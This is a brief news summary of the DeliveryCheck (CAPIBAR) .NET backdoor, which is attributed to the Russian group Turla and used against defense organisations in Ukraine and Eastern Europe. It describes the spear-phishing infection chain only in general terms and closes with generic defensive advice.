Ukraine and Eastern Europe Defense Sector Targeted by Stealthy .NET Backdoor

Ukraine and Eastern Europe defense sector targeted by .NET-based backdoor

The defense sector in Ukraine and Eastern Europe has been hit by a new backdoor called DeliveryCheck, also known as CAPIBAR or GAMEDAY. This backdoor is written in the .NET programming language and has the ability to deliver further malicious payloads. The attacks have been attributed to a Russian nation-state actor called Turla, according to the Microsoft threat intelligence team and the Computer Emergency Response Team of Ukraine (CERT-UA).

Turla is a known threat actor that has been active for years, targeting various sectors including defense, government, and diplomatic organizations. The group is backed by the Russian government and has a history of sophisticated attacks.

DeliveryCheck is a stealthy backdoor that primarily targets Windows-based systems. It uses a multi-stage infection process to gain access to the victim’s network. The attackers use spear-phishing emails to trick users into opening a malicious document, which then installs the backdoor on the victim’s machine.

Once installed, DeliveryCheck establishes communication with command-and-control servers operated by the attackers. It can then receive instructions and deliver additional payloads onto the compromised systems.

This new backdoor poses a serious threat to the defense sector in Ukraine and Eastern Europe. Its use of the .NET programming language makes it more difficult to detect and analyze, as it blends in with legitimate .NET applications commonly used in these sectors. The fact that it is attributed to Turla adds further concern, as this group is known for its advanced capabilities.

To mitigate the risk posed by DeliveryCheck, organizations in the defense sector should increase their security measures. This includes training employees to identify and avoid spear-phishing attacks, keeping software and operating systems updated, and implementing strong network security protocols.

This latest attack highlights the ongoing need for heightened cybersecurity in the defense sector. As threat actors continue to develop new and sophisticated techniques, it is crucial for organizations to stay vigilant and adapt their defenses to protect sensitive information and critical infrastructure.

Original Article: https://thehackernews.com/2023/07/turlas-new-deliverycheck-backdoor.html